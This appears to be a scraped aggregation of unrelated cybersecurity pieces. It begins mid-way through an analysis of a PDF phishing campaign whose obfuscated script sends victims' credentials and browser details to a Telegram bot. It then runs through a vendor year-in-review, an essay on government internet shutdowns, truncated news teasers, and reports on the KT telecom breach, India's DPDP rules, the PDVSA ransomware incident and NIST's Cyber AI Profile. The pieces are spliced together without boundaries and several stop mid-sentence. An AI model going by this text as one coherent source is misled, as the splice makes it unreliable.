There was also a small personalization touch. The “Estimado” greeting sets a professional tone and is common in business correspondence across Spanish-speaking regions.
For a full analysis read on, but the real clue is that the harvested credentials accompanied additional information about the victim’s browser, operating system, language, cookies, screen size, and location. This data was sent directly to the scammer’s account on Telegram, where it’s likely to be used to compromise the business network or sold on to other cybercriminals.
A quick search on VirusTotal showed that there were several PDF files linking to the exact same ionoscloud.com subdomain.
Analysis
As I pointed out earlier, the source code of the initial phishing page did not reveal a lot. These are probably auto-generated templates that can be planted on any website, allowing attackers a fast rotation.
ionoscloud.com belongs to IONOS Cloud, the cloud infrastructure division of IONOS, a major European hosting company. It offers services similar to Amazon AWS or Microsoft Azure, including hosting for websites and files. Scammers specifically choose reputable cloud platforms like IONOS Cloud because of the “halo effect” of being hosted at a well-known domain, which means security companies can’t just block the whole domain.
The criminals also get the flexibility to quickly spin up, modify, or tear down phishing sites and continue to evade detection by moving to new URLs or storage buckets.
So, we followed the trail to a JavaScript file, which turned out to be obfuscated script—and a long one at that. But the end of it looked promising.
113,184 lines of code
Since it was still unclear at this point what it was up to, I made a change to the script to avoid infection and which allowed me to get the source code without executing the script. To achieve this, I replaced the last line of the original script with code that exports the next layer to an HTML file.
The next obfuscation layer turned out to be easy. All it contained was a long string that needed to be unescaped. Because of the length, I used an online decoder to do that for me.
Simple unescape script
This showed me the code for the actual form that the target would see—and the goal of the whole phishing expedition.
The part that did the actual harvesting was hidden in another script.
This was still pretty long and obfuscated but by analyzing the code and giving the functions readable names I managed to find out which information the script gathered. For example, the script uses the ipapi location service:
Deobfuscated location script
And I found out where it sent the details.
Telegram bot function
Any credentials entered on the phishing page are POSTed directly to the attacker’s Telegram bot and immediately forwarded to their chosen Telegram chat for collection. The Telegram chat ID hardcoded in the script was 5485275217.
How to stay safe
The advice here is pretty standard. (Do as our customer did, not as I did.)
Phishing and malware campaigns frequently use PDF files, so treat them like any other attachment: don’t open until the trusted sender confirms sending you one.
Never click links inside attachments without verifying with the sender, especially if you weren’t expecting the message or don’t know the sender.
Always check the address of any website asking for your login details. A password manager can help here, as it won’t auto-fill credentials on a fake site.
Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
Use an email security solution that can detect and quarantine suspicious attachments.
Pro tip:Malwarebytes Scam Guard recognized the screenshot of the PDF as a phishing attempt and provided advice on how to deal with it.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
As holiday lights go up and inboxes fill with year-in-review emails, it’s tempting to look back on 2025 as “the year of AI.”
But for security teams, it was something more specific – the year APIs, AI agents, and MCP servers collided across the API fabric, expanding the attack surface faster than most organizations could keep up.
At Salt Security, we spent 2025 focused on one thing: defending the API action layer where AI, applications, and data intersect. And we did it with a steady drumbeat of innovation, a new “gift” for security teams almost every month.
So in the spirit of the season, here’s a look back at Salt’s 12 Months of Innovation – a year-long series of product launches, partnerships, and research milestones designed to help organizations stay ahead of fast-moving threats.
We kicked off the year by shining a harsh light on what many teams already suspected:
APIs now sit at the center of almost every digital initiative.
Zombie and unmanaged APIs still live in production.
Software supply chain dependencies are quietly multiplying risk.
Early 2025 research and thought leadership from Salt Labs showed just how dangerous it is to run modern AI and automation on top of APIs you don’t fully understand or control.
Takeaway: January set the tone – defending tomorrow’s API fabric with yesterday’s tools is no longer an option.
February – A Spotlight on API Reality
In February, we went from “we think we have a problem” to “here are the numbers.”
With the latest State of API Security Report and key industry recognitions such as inclusion in top security lists, Salt brought hard data to boardroom and CISO conversations.
The message was clear:
API traffic is exploding.
Attackers are targeting APIs at scale.
Traditional perimeter and app security are missing critical context.
Takeaway: API security is no longer a niche concern. It’s a business risk that demands strategy, budget, and board-level attention.
March – Gold Medals & Rising Shadows
March blended validation and urgency.
On one side, industry bodies recognized Salt’s leadership with awards like a Gold Globee, underscoring the maturity and impact of our platform.
On the other, new blogs and research highlighted reality on the ground:
Compliance and data privacy pressure are rising.
AI-driven attacks are accelerating, not slowing.
Takeaway: Excellence in API security isn’t just about winning awards, it’s about staying ahead of adversaries who are constantly adapting.
April – A Season of Partnerships & Paradigm Shifts
High-profile AI mishaps, including incidents like the McDonald’s chatbot breach, made one thing painfully obvious: conversational AI and digital experiences are only as safe as the APIs behind them.
Salt responded with:
Deep-dive blogs on AI agent risk and API blind spots.
The launch of Salt Surface, designed to map and prioritize exposed API risk.
Takeaway: 2025 was the year CISOs started asking not just “What APIs do we have?” but “Which of these are exposed, exploitable, and business-critical?”
August – Autonomous Everything
By August, “autonomous” wasn’t just a buzzword, it was a roadmap theme.
Organizations leaned hard into:
Autonomous workflows
AI-driven decisioning
Automated threat detection and response
Salt’s innovation in this space emphasized a key reality: AI, autonomy, and APIs are inseparable.
We advanced protections for autonomous threat hunting and AI-driven security use cases, reinforcing that if APIs are compromised, autonomous systems are too.
Takeaway: You can’t secure autonomous operations if you’re not securing the API action layer that powers them.
Salt introduced the industry’s first solution to secure AI agent actions across APIs and MCP servers, bringing real controls to a problem that had mostly been theoretical.
This meant:
Protection against prompt injection and misuse.
Guardrails around what AI agents can access or execute.
Enforceable policy where it matters: at the API and action level.
Takeaway: The AI agent revolution doesn’t have to be a security nightmare — if you secure the actions, not just the model.
In October, new data from Salt and customer environments revealed how deep the AI + API blind spots really go.
We broke down:
Misconfigurations in AI-driven workflows.
Risky patterns in agentic and MCP deployments.
Common mistakes teams make when bolting AI onto existing architectures.
Through detailed analysis and practical guidance, we helped teams turn confusion into a roadmap for modernizing their security posture.
Takeaway: Education is as important as technology. You can’t fix what you don’t fully understand.
November – Security Starts in Code
November brought a massive step forward in shifting API security left and right at the same time.
We launched:
GitHub Connect - to scan code repositories for shadow APIs, spec mismatches, and insecure patterns before they ship.
MCP Finder - to identify risky MCP configurations and AI-integrated workflows early in the development lifecycle.
Combined with runtime intelligence from the Salt platform, customers could now connect:
What’s being written → What’s being deployed → What’s being exploited
Takeaway: Real API security covers the full lifecycle, from design and code to production traffic and AI-agent actions.
December – Hello, Pepper
We closed the year with a new kind of experience: Ask Pepper AI.
Ask Pepper AI turns Salt’s platform into a conversational partner, letting users:
Ask natural-language questions about APIs, risks, and threats.
Accelerate investigation and incident response.
Bring complex insights to teams who don’t live inside dashboards.
Alongside MCP protection for AWS WAF, December marked the next stage in our vision: API security that’s not just powerful, but accessible and intuitive.
Takeaway: When security teams can simply ask questions and get meaningful, contextual answers, they move faster, and so does the business.
Looking Ahead: Building on a Year of Innovation
If 2025 was the year APIs fully merged with AI agents, automation, and MCP servers, 2026 will be the year organizations either embrace the API action layer or fall behind those that do.
At Salt Security, our focus remains the same:
See everything - every API, every action, every blind spot.
Understand the context - who’s calling what, from where, and why.
Stop attacks - before they turn into outages, data loss, or brand damage.
The 12 Months of Innovation were just the beginning. The threats are evolving, and so are we.
It’s not always immediately clear why your IP has been listed or how to fix it. To help, we’ve added a new “troubleshooting” step to the IP & Domain Reputation Checker, specifically for those whose IPs have been listed on the Combined Spam Sources (CSS) Blocklist - IPs associated with low-reputation email. Learn how you can diagnose the issue using this new feature.
For two days in September, Afghanistan had no internet. No satellite failed; no cable was cut. This was a deliberate outage, mandated by the Taliban government. It followed a more localized shutdown two weeks prior, reportedly instituted “to prevent immoral activities.” No additional explanation was given. The timing couldn’t have been worse: communities still reeling from a major earthquake lost emergency communications, flights were grounded, and banking was interrupted. Afghanistan’s blackout is part of a wider pattern. Just since the end of September, there were also major nationwide internet shutdowns in Tanzania and Cameroon, and significant regional shutdowns in Pakistan and Nigeria. In all cases but one, authorities offered no official justification or acknowledgment, leaving millions unable to access information, contact loved ones, or express themselves through moments of crisis, elections, and protests.
The frequency of deliberate internet shutdowns has skyrocketed since the first notable example in Egypt in 2011. Together with our colleagues at the digital rights organisation Access Now and the #KeepItOn coalition, we’ve tracked 296 deliberate internet shutdowns in 54 countries in 2024, and at least 244 more in 2025 so far.
This is more than an inconvenience. The internet has become an essential piece of infrastructure, affecting how we live, work, and get our information. It’s also a major enabler of human rights, and turning off the internet can worsen or conceal a spectrum of abuses. These shutdowns silence societies, and they’re getting more and more common.
Shutdowns can be local or national, partial or total. In total blackouts, like Afghanistan or Tanzania, nothing works. But shutdowns are often targeted more granularly. Cellphone internet could be blocked, but not broadband. Specific news sites, social media platforms, and messaging systems could be blocked, leaving overall network access unaffected—as when Brazil shut off X (formerly Twitter) in 2024. Sometimes bandwidth is just throttled, making everything slower and unreliable.
Sometimes, internet shutdowns are used in political or military operations. In recent years, Russia and Ukraine have shut off parts of each other’s internet, and Israel has repeatedly shut off Palestinians’ internet in Gaza. Shutdowns of this type happened 25 times in 2024, affecting people in 13 countries.
Reasons for the shutdowns are as varied as the countries that perpetrate them. General information control is just one. Shutdowns often come in response to political unrest, as governments try to prevent people from organizing and getting information; Panama had a regional shutdown this summer in response to protests. Or during elections, as opposition parties utilize the internet to mobilize supporters and communicate strategy. Belarusian president Alyaksandr Lukashenko, who has ruled since 1994, reportedly disabled the internet during elections earlier this year, following a similar move in 2020. But they can also be more banal. Access Now documented countries disabling parts of the internet during student exam periods at least 16 times in 2024, including Algeria, Iraq, Jordan, Kenya, and India.
Iran’s shutdowns in 2022 and June of this year are good examples of a highly sophisticated effort, with layers of shutdowns that end up forcing people off the global internet and onto Iran’s surveilled, censored national intranet. India, meanwhile, has been the world shutdown leader for many years, with 855 distinct incidents. Myanmar is second with 149, followed by Pakistan and then Iran. All of this information is available on Access Now’s digital dashboard, where you can see breakdowns by region, country, type, geographic extent, and time.
There was a slight decline in shutdowns during the early years of the pandemic, but they have increased sharply since then. The reasons are varied, but a lot can be attributed to the rise in protest movements related to economic hardship and corruption, and general democratic backsliding and instability. In many countries today, shutdowns are a knee-jerk response to any form of unrest or protest, no matter how small.
A country’s ability to shut down the internet depends a lot on its infrastructure. In the US, for example, shutdowns would be hard to enforce. As we saw when discussions about a potential TikTok ban ramped up two years ago, the complex and multifaceted nature of our internet makes it very difficult to achieve. However, as we’ve seen with total nationwide shutdowns around the world, the ripple effects in all aspects of life are immense. (Remember the effects of just a small outage—CrowdStrike in 2024—which crippled 8.5 million computers and cancelled 2,200 flights in the US alone?)
The more centralized the internet infrastructure, the easier it is to implement a shutdown. If a country has just one cellphone provider, or only two fiber optic cables connecting the nation to the rest of the world, shutting them down is easy.
Shutdowns are not only more common, but they’ve also become more harmful. Unlike in years past, when the internet was a nice option to have, or perhaps when internet penetration rates were significantly lower across the Global South, today the internet is an essential piece of societal infrastructure for the majority of the world’s population.
Access Now has long maintained that denying people access to the internet is a human rights violation, and has collected harrowing stories from places like Tigray in Ethiopia, Uganda, Annobon in Equatorial Guinea, and Iran. The internet is an essential tool for a spectrum of rights, including freedom of expression and assembly. Shutdowns make documenting ongoing human rights abuses and atrocities more difficult or impossible. They are also impactful on people’s daily lives, business, healthcare, education, finances, security, and safety, depending on the context. Shutdowns in conflict zones are particularly damaging, as they impact the ability of humanitarian actors to deliver aid and make it harder for people to find safe evacuation routes and civilian corridors.
Defenses on the ground are slim. Depending on the country and the type of shutdown, there can be workarounds. Everything, from VPNs to mesh networks to Starlink terminals to foreign SIM cards near borders, has been used with varying degrees of success. The tech-savvy sometimes have other options. But for most everyone in society, no internet means no internet—and all the effects of that loss.
The international community plays an important role in shaping how internet shutdowns are understood and addressed. World bodies have recognized that reliable internet access is an essential service, and could put more pressure on governments to keep the internet on in conflict-affected areas. But while international condemnation has worked in some cases (Mauritius and South Sudan are two recent examples), countries seem to be learning from each other, resulting in both more shutdowns and new countries perpetrating them.
There’s still time to reverse the trend, if that’s what we want to do. Ultimately, the question comes down to whether or not governments will enshrine both a right to access information and freedom of expression in law and in practice. Keeping the internet on is a norm, but the trajectory from a single internet shutdown in 2011 to 2,000 blackouts 15 years later demonstrates how embedded the practice has become. The implications of that shift are still unfolding, but they reach far beyond the moment the screen goes dark.
This essay was written with Zach Rosson, and originally appeared in Gizmodo.
Modern security teams often feel like they’re driving through fog with failing headlights. Threats accelerate, alerts multiply, and SOCs struggle to understand which dangers matter right now for their business. Breaking out of reactive defense is no longer optional. It’s the difference between preventing incidents and cleaning up after them.
Below is the path from reactive firefighting to a
The threat actor known as Jewelbug has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America.
Check Point Research is tracking the cluster under the name Ink Dragon. It's also referenced by the broader cybersecurity community under the names CL-STA-0049, Earth Alux, and REF7707. The
A new campaign named GhostPoster has leveraged logo files associated with 17 Mozilla Firefox browser add-ons to embed malicious JavaScript code designed to hijack affiliate links, inject tracking code, and commit click and ad fraud.
The extensions have been collectively downloaded over 50,000 times, according to Koi Security, which discovered the campaign. The add-ons are no longer available.
In an era marked by escalating cyber threats and evolving risk landscapes, organisations face mounting pressure to strengthen their security posture whilst maintaining seamless user experiences. At Thales, we recognise that robust security must be foundational – embedded into products and services by design, not bolted on as an afterthought. This principle underpins our commitment […]
As Artificial Intelligence technology rapidly advances, Large Language Models (LLMs) are being widely adopted across countless domains. However, with this growth comes a critical challenge: LLM security issues are becoming increasingly prominent, posing a major constraint on further development. Governments and regulatory bodies are responding with policies and regulations to ensure the safety and compliance […]
For a long time, DDoS attacks were easy to recognize. They were loud, messy, and built on raw throughput. Attackers controlled massive botnets and flooded targets until bandwidth or infrastructure collapsed. It was mostly a scale problem, not an engineering one. That era is ending. A quieter and far more refined threat has taken its […]
The key elements in a security operations center's strategy map very closely to the swim/bike/run events in a triathlon. SOCs, like triathletes, perform well when their "inputs" are strong.
A recent report by British technology research firm Rethink Technology Research has raised serious concerns over a cyberattack on KT, South Korea’s leading telecom operator, suggesting the incident may involve state-level cyber espionage rather than a simple fraud case. The report, titled “KT Cyberattack: More Serious Than You Think,” was published on December 10 and analyzes the implications of the breach in detail.According to Rethink Technology Research, the KT cyberattack appears to have targeted femtocells, small cellular base stations used in homes and offices, not for micro-payment fraud, but potentially to collect large-scale data at a national level. The report states, “The cyberattack on South Korean telecom company KT is not a simple fraud case but closer to a state-level cyber espionage activity spanning several years when examining the details.”The report further notes that KT’s internal logs only date back to August 2024, making it difficult to confirm what occurred at vulnerable points before that period. Analysts suggest that this lack of historical data complicates the investigation and points to possible systemic failures in femtocell management, server oversight, and encryption protocols. “It seems inevitable that KT's leadership will face accountability for management negligence,” the report adds.
Security Experts Weigh In
Security experts in South Korea have weighed in on the report’s findings. Dmitry Kurbatov, Chief Technology Officer at global communication security company SecurityGen, posted on LinkedIn that “the unauthorized micro-payment incident at KT is likely a deeper issue involving a network of thousands of femtocells.” Similarly, Kim Yong-dae, a professor in the Department of Electrical and Electronic Engineering at KAIST, described the incident as essentially a wiretapping operation rather than conventional financial fraud.While Rethink Technology Research frames the attack as unprecedented in scope and sophistication, KT officials have pushed back against the report’s conclusions. A company spokesperson stated, “If you look at other reports by the author of this report, there is a tendency to be favorable and biased toward certain companies. It is difficult to regard this as an objective interpretation.”
The KT Cyberattack Investigation Timeline
The cyberattack on KT was first detected in early September, when irregular micro-payments were identified across the network. A joint government-private investigation has been ongoing for over three months, with authorities yet to release the final findings. Analysts attribute the delay to stretched investigative resources due to a series of large-scale cyber incidents in South Korea, including the Coupang data leak. Some have also speculated that the prolonged timeline may indicate an intentional delay on KT’s part.For comparison, the SK Telecom hacking case was resolved within two and a half months, followed by compensation announcements for affected users. In the case of KT, an investigation team official noted during a briefing following the presidential business report on December 12, “While investigating KT, additional issues have emerged, and server forensics are taking a considerable amount of time.”Industry observers warn that the cyberattack on KT should serve as a cautionary tale for telecom operators not only in South Korea but globally.
Nikhil Jhanji, Principal Product Manager, Privy by IDfy
The DPDP rules have finally given enterprises a clear structure for how personal data enters and moves through their systems. What has not been discussed enough is that this same structure also reduces the space in which deepfakes and synthetic identities can slip through.
For months the Act lived in broad conversation without detail. Now enterprises have to translate the rules into real action. As they do that work, a practical advantage becomes visible. The discipline required around consent, accuracy, and provenance creates an environment where false personas cannot blend in as easily. This was not the intention of the framework, but it is an important consequence.
DPDP Rules Bring Structure to Enterprise Data Intake
The first shift happens at data entry. The rules require clear consent, proof of lawful purpose, and timely correction of errors. This forces organisations to examine the origin of the data they collect and to maintain records that confirm why the data exists. Better visibility into the source and purpose of data makes it harder for synthetic identities to enter the system through weak or careless intake flows.
This matters because the word synthetic now carries two very different meanings. One meaning refers to responsible synthetic data used in privacy enhancing technologies. This type is created intentionally, documented carefully, and used to train models or test systems without revealing personal information. It supports the goals of privacy regulation and does not imitate real individuals.
Synthetic Data vs Synthetic Identity: A Critical Difference
The other meaning refers to deceptive synthetic identities, false personas deliberately created to exploit weak verification processes. These may include deepfake facial images, manipulated voice samples, and fabricated documents or profiles that appear legitimate enough to pass routine checks.
This form of synthetic identity thrives in environments with poor data discipline and is designed specifically to mislead systems and people.
The DPDP rules help enterprises tell the difference with more clarity. Responsible synthetic data has provenance and purposeful creation. Deceptive synthetic identity has neither. Once intake and governance become more structured, the distinction becomes easier to detect through both human review and automated systems.
Cleaner Data Improves Fraud and Risk Detection
As organisations rewrite consent journeys and strengthen provenance under the DPDP rules, the second advantage becomes clear. Cleaner input improves downstream behaviour. Fraud engines perform better with consistent signals.
Risk decisions become clearer. Customer support teams gain more dependable records. When data is scattered and unchecked, synthetic personas move more freely. When data is organised and verified, they become more visible.
This is where the influence of DPDP rules becomes subtle. Deepfake content succeeds by matching familiar patterns. It blends into weak systems that cannot challenge continuity. Structured data environments limit these opportunities. They reduce ambiguity and shrink the number of places where a false identity can hide. This gives enterprises a stronger base for every detection capability they depend on.
There is also a behavioural shift introduced by the DPDP rules. Once teams begin managing data with more discipline, their instinct around authenticity improves. Consent is checked properly. Accuracy is taken seriously. Records are maintained rather than ignored. This change in everyday behaviour strengthens identity awareness across the organisation. Deepfake risk is not only technical. It is also operational, and disciplined teams recognise anomalies faster.
DPDP Rules Do Not Stop Deepfakes—but They Shrink the Attack Surface
None of this means that DPDP rules stop deepfakes. They do not. Deepfake quality is rising and will continue to challenge even mature systems. What the rules offer is a necessary foundation. They push organisations to adopt habits of verification, documentation, and controlled intake. Those habits shrink the attack surface for synthetic identities and improve the effectiveness of whatever detection tools a company chooses to use.
As enterprises interpret the rules, many will see the work as procedural. New notices. Updated consent. Retention plans. But the real strength will emerge in the functions that depend on reliable identity and reliable records. Credit decisions. Access management. Customer onboarding. Dispute resolution. Identity verification. These areas become more stable when the data that supports them is consistent and traceable.
The rise of deepfakes makes this stability essential. False personas are cheap to create and increasingly convincing. They will exploit gaps wherever they exist. Strong tools matter, but so does the quality of the data that flows into those tools. Without clean and verified data, even advanced detection systems struggle.
The DPDP rules arrive at a moment when enterprises need stronger foundations. By demanding better intake discipline and clearer data pathways, they reduce the natural openings that deceptive synthetic content relies on. In a world where authentic and synthetic individuals now compete for space inside enterprise systems, this shift may become one of the most practical outcomes of the entire compliance effort.
(This article reflects the author’s analysis and personal viewpoints and is intended for informational purposes only. It should not be construed as legal or regulatory advice.)
Venezuela’s state-run oil company, Petróleos de Venezuela (PDVSA), has confirmed that a cyberattack on PDVSA’s administrative systems caused widespread disruptions, even as the company publicly claimed that oil operations were unaffected. The Venezuela oil cyberattack or PDVSA cyberattack comes at a time of escalating political and military tensions between Caracas and Washington, following recent U.S. actions against Venezuelan oil shipments.
PDVSA announced the incident in a statement on Monday, blaming the attack on the United States and describing it as part of a broader strategy to seize control of Venezuela’s oil resources. However, cybersecurity experts and company sources cited by Reuters have found no evidence linking the PDVSA cyberattack to the U.S. government.
PDVSA Blames US for Cyberattack on Venezuela’s Oil Company
In its statement, PDVSA accused the United States of coordinating the PDVSA cyberattack as part of what it called an aggressive campaign against Venezuela’s energy sovereignty.
“This attempt at aggression adds to the public strategy of the U.S. government to take over Venezuelan oil by force and piracy,” PDVSA said. The company claimed the cyberattack was carried out by foreign interests working with domestic actors to undermine Venezuela’s right to develop its energy sector independently.
Venezuela’s oil ministry echoed these accusations, stating that the attack aligned with U.S. efforts to control the country’s oil through “force and piracy.” Despite these claims, PDVSA provided no technical details about the attack or evidence supporting the allegations.
Ransomware Attack Suspected as PDVSA Systems Go Down
While PDVSA said it had recovered from the cyberattack, multiple sources told Reuters that the PDVSA ransomware attack was far more damaging than officials admitted. According to four sources, the company’s administrative systems remained down, forcing a halt to oil cargo deliveries.
“There’s no delivery of cargoes, all systems are down,” one PDVSA source told Reuters, adding that workers internally described the incident as a ransomware attack.
Sources said PDVSA detected the attack days earlier. In attempting to resolve the issue, antivirus software reportedly disrupted the company’s entire administrative network. As a result, workers were forced to keep handwritten records after systems failed to restart.
Although oil production, refining, and domestic fuel distribution were reportedly unaffected due to PDVSA cyberattack, export logistics were severely disrupted. A shipper involved in Venezuelan oil deals confirmed that all loading instructions for export markets remained suspended.
Oil Exports Impacted as PDVSA Limits System Access
As the Venezuela cyberattack on PDVSA continued, the company reportedly ordered administrative and operational staff to disconnect from internal systems. Access for indirect workers was also restricted, according to sources.
PDVSA’s website remained offline as of Tuesday afternoon, adding to concerns about the scale of the disruption. Despite official claims of recovery, sources said the effects of the cyber incident were ongoing.
PDVSA Cyberattack Follows US Seizure of Venezuelan Oil Tanker
The PDVSA cyberattack occurred just one week after U.S. military forces seized a PDVSA tanker carrying nearly 1.85 million barrels of Venezuelan heavy crude in the Caribbean. The seizure drew strong condemnation from Cuba, which described it as an act of piracy and a violation of international law.
Cuban officials said the tanker was believed to be transporting oil destined for Cuba, a country that relies heavily on Venezuelan oil supplies. Following the seizure, Reuters reported that Venezuelan oil exports fell sharply, with some tankers turning back due to fears of further U.S. action.
U.S. officials have indicated that more tanker seizures could follow in the coming weeks.
Geopolitical Pressure Intensifies Around Venezuela’s Oil Industry
The PDVSA cyberattack has unfolded amid a broader U.S. military buildup in the Caribbean, U.S. strikes on alleged drug trafficking boats, and renewed sanctions targeting Venezuelan shipping and individuals linked to President Nicolás Maduro.
The Venezuelan government maintains that the United States is seeking regime change to gain access to the country’s vast oil reserves. PDVSA, which plays a key role in Venezuela’s financial ties with China, Russia, Iran, and Cuba, remains central to that struggle.
As tensions rise, the PDVSA cyberattack highlights how digital attacks, sanctions, and military pressure are increasingly converging around Venezuela’s oil sector, with significant implications for global energy markets and regional stability.
Artificial intelligence is increasingly embedded in enterprise environments, creating new cybersecurity risks alongside operational benefits. To address this shift, the National Institute of Standards and Technology (NIST) has released a preliminary draft of guidance called the Cyber AI Profile, aimed at helping organizations align their cybersecurity strategies with AI adoption.
These draft NIST guidelines are presented in a new document known as the Cybersecurity Framework Profile for Artificial Intelligence (NISTIR 8596), commonly referred to as the Cyber AI Profile. The publication is intended to help organizations apply the NIST Cybersecurity Framework, specifically CSF 2.0, to the secure and responsible use of AI technologies. The goal is to accelerate AI adoption while mitigating the cybersecurity risks that accompany AI’s rapid advancement.
Why Do We Need AI Cybersecurity Guidelines?
According to NIST, AI affects cybersecurity in multiple ways. Organizations must secure AI systems themselves, consider how AI can strengthen cyber defense operations, and prepare for a growing class of AI-enabled cyberattacks. The Cyber AI Profile reflects this reality by organizing its guidance around three overlapping focus areas: securing AI systems, conducting AI-enabled cyber defense, and thwarting AI-enabled cyberattacks.Barbara Cuthill, one of the authors of the profile, stresses that organizations cannot afford to treat AI as a distant concern. “Regardless of where organizations are on their AI journey, they need cybersecurity strategies that acknowledge the realities of AI’s advancement,” she said.
Inside the Cyber AI Profile and Its Three Focus Areas
The Cyber AI Profile is the result of a year-long collaborative effort involving NIST cybersecurity and AI specialists, supported by extensive public engagement. Over the course of the project, more than 6,500 individuals joined a community of interest to provide input. NIST released an initial concept paper in February 2025, followed by a workshop in April 2025 and a series of community meetings during the summer. This process led to the release of the preliminary draft, which is now open for a 45-day public comment period.Each of the three focus areas addressed in the Cyber AI Profile serves a distinct role. Securing AI systems involves identifying cybersecurity challenges that emerge when AI is integrated into organizational infrastructure and ecosystems. Conducting AI-enabled cyber defense examines how AI can be used to strengthen cybersecurity operations while recognizing the risks associated with deploying AI in defensive roles. Thwarting AI-enabled cyberattacks focuses on building resilience against threats that use AI to increase their scale, speed, or effectiveness.“The three focus areas reflect the fact that AI is entering organizations’ awareness in different ways,” Cuthill said. “But ultimately every organization will have to deal with all three.”
Applying CSF 2.0 and the NIST Cybersecurity Framework to AI
Through the lens of the NIST Cybersecurity Framework, the Cyber AI Profile helps organizations clarify their cybersecurity objectives related to AI and CSF 2.0. It offers structured insights to help organizations understand, evaluate, and address AI-related cybersecurity concerns while integrating AI into existing cybersecurity programs in a deliberate way.NIST refers to the Cyber AI Profile as a “community profile,” meaning it applies to CSF 2.0 to shared goals across multiple sectors. The Cyber AI Profile joins similar community profiles developed for manufacturing, financial services, telecommunications, and other industries.The preliminary draft is intended to gather public feedback before NIST releases an initial public draft in 2026. That version is expected to refine the guidance further and include expanded mappings to additional NIST resources. When finalized, the profile will help organizations incorporate AI into cybersecurity planning by identifying priority actions.Cuthill said the authors hope the Cyber AI Profile will continue to evolve as a practical resource. “The Cyber AI Profile is all about enabling organizations to gain confidence in their AI journey,” she said. “We hope it will help them feel equipped to have conversations about how their cybersecurity environment will change with AI and to augment what they are already doing with their cybersecurity programs.”
Discover how homomorphic encryption (HE) enhances privacy-preserving model context sharing in AI, ensuring secure data handling and compliance for MCP deployments.
Explore the differences between LDAP and Single Sign-On (SSO) for user authentication. Understand their use cases, benefits, and how they fit into your enterprise security strategy.
Learn how to configure users without OTP login in your applications. This guide covers conditional authentication, account settings, and fallback mechanisms for seamless access.
Login
While generative AI demos and LLM hype steal the spotlight, enterprise infrastructure is being quietly re-architected, not from … (more…) 